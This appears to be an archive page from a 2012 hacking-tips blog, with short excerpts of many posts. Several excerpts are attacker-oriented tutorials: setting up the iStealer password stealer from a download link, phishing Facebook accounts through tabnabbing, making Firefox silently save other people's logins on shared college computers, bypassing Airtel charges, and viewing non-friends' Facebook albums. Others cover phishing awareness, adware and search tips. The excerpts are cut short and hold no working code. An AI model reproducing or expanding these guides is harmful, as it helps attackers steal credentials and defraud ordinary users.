Posts

Showing posts from April, 2012

iStealer Tutorial

Image
Before we start, I just wanted to say this, This is tutorial for people which have no knowledge on configuring a iStealer server! If you have no knowledge on how to configure a iStealer server please read on!! Also before we start we need to sign up for a free FTP service, I currently use http://www.drivehq.com so use that one, sign up and now lets start! Step 1 ( Obtaining iStealer ): Go to the following link: *Note: This file was uploaded by me, it is safe, If you don't believe me nor want to download it search for it on google. I have been using this for a while so I consider it safe. Download Link: http://adf.ly/7rdCS This application WILL be detected by your anti-virus. Of course online scanners detect it as infected.. it's a stealer you know..if you still believe this to be infected by me please do not download! Step 2: (Extracting) Right Click and extract "iStealer 3.0" Once extracted there should be two files. One folder called "Icon Pack" and one a

How to hack Facebook Account ? | Tabnabbing.

Image
My intension of posting an article on such a title is not to harm anyone nor bring down the reputation of the concern services or promote black hat rather I want to aware the users of such a threat they can encounter and for educational purposes. I recommend readers if they abide by the blog's Disclaimer then they can proceed reading this post otherwise leave this page immediately. Facebook is one of the most hyped and widely used social networking site these days.So,attackers always look out for profiles where they can post there spam message,advertise etc.So here in this post I will use a phishing technique called as " Tabnabbing " brought out by Aza Raskin .If you are new to it you can follow my earlier post on Tabnabbing.Keeping in mind that you know what is " Phishing " and how it is done so,lets start..... Requirements: 1.One should know how Phishing is carried out if not ( Read here ) 2.Should have a free hosting account(t35.com /110mb.com / yourfreeh

Full Google Hacking

Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers’ weapons Basic Operators: +, -, ~ , ., *, “”, |, OR Advanced Operators: allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange Basic Operators !! (+) force inclusion of something common Google ignores common words (where, how, digit, single letters) by default: Example: StarStar Wars Episode +I (-) exclude a search term Example: apple –red (“) use quotes around a search term to search exact phrases: Example: “Robert Masse” Robert masse without “” has the 309,000 results, but “robert masse” only has 927 results. Reduce the 99% irrelevant results Basic Operators (~) search synonym: Example: ~food Return the results about food as well as recipe, nutrition and cooking information ( . ) a single-character wildcard: Example: m.trix Return the resu

Facebook Hacking: Remote File Inclusion Attack

Image
Facebook being the world's largest social networking website has became the major target for the hackers, attackers and other malicious users. Facebook has hired the team world's leading security experts in order for them to improve their website's security. Moreover facebook also pays 500$ to any one who can identify any sort of vulnerability inside facebook.

Google Search Tricks

Image
Well let me tell You what actually google tricks mean. Google tricks/google tips, does not mean hacking google , Using the below Google operators, we can get the desired google result very quickly. Well we can name this as hidden google secrets or Advanced google searching.  

Increase your RAM and so system speed

1). Start any application, say Word . Open some large documents. 2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage . You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.   3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).

Latest Airtel Hack

Now a days Airtel gives New option to the Subscriber to access Mobile Office daily @ Rs.25.00/- per day. But this is too Costly. Only 24 hours and the cost is Rs.25.00 Oh GOD!! But I got a Trick that’s help me to Activate my Mobile Office whole 30 days only for 25.00/. Its really good. Just follow the Trick-

Rapidshare Hack

There are two hacks to beat Rapidshare download limits and waiting time. 1) Rapidshare Hack (For Firefox Users) :- The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors. The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment. But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

Hack Firefox-Make it Auto Save and Hack all Account ID and Password In Collage

Image
I am going tell you how to make Mozila Firefox Browser as auto save by which when a person Enter any ID and password then it automatic save without any information to Logger. It also save website address by which when you watch then you directly go to website(like FB,orkut,gmail) and Enter ID ,Password and Hack the person's account.

Running Multiple Instances of Google Talk

Users of Google Talk (GTalk) can also let GTalk go to polygamy, that\92s running multiple instances of Google Talk and login to multiple Google accounts on Google Talk. The polygamy trick can be do ne without any crack, patch or hack, with just a simple command li ne parameter or switch /nomutex appended to the Google Talk shortcut. Ability to polygamy running multiple Google Talk is useful if users have multiple Google Talk accounts (or Google or Gmail accounts that used to login to GTalk) or multiple profiles or personalities, and don\92t want to log on and off from o ne account to another account every time when want to switch, or want to log in to all accounts at the same time on the same computer.

Run Firefox inside Firefox

Image
How to run Firefox inside Firefox.? Yup you can run Firefox inside firefox just by typing following url. How about Opening Firefox inside Firefox which is again in another Firefox..? Not bad huh? And its really easy too just type in this url in Firefox's address bar and there you go! Firefox inside Firefox!

Facebook Hack – View photo albums of non-friends

Image
A new facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.

Tips And Tricks To Protect Yourself From Phishing

Phishing is a variant of “ fishing ”.It is used to bait the users to give out their sensitive information such as credit card information,net banking username and passwords and other important personal and financial information.Now a days social networking sites like facebook and orkut are highly targeted sites.These attacks are mainly carried by using Emails,Instant messaging or phone calls.Phishing is a example of social engineering to fool users.In Phishing people are convinced to enter their information in spoofed sites.

Beware Of Tab Napping: New Phishing Technique

I have recently wrote a post on all the techniques of phishing and how to detect these phishing techniques.You can read the post on phishing techniques by clicking here .As people were becoming more and more aware of these traditional phishing techniques and it was becoming difficult for the scammers to cheat people using these phishing techniques so they invented a new technique called “Tab Napping”.This is one of the most intelligent and wise methods of phishing and it not easily detected by a normal internet user until and unless he is aware of this phishing technique.

What Is Adware And How Does It Work

Adwares are the advertisements that popup in your computer screen in .These are different from viruses and malwares becuase most of the times it is installed with the user’s consent.If an adware is installed on your computer it will provide monetary gains to the publisher moreover these adware can automatically install keyloggers or other harmful softwares without the consent of the user which can send credit card details or other private information.

How to Query Google Results Via Sms

SMS’s are one of the most preferred mode of communication among people.Usually people believe that Internet is the only way to get google results.Recently Google has launched a new service that gives you  access to Movie show times ,Locations of local businesses ,Word meanings ,weather forecast ,Product prices and much more.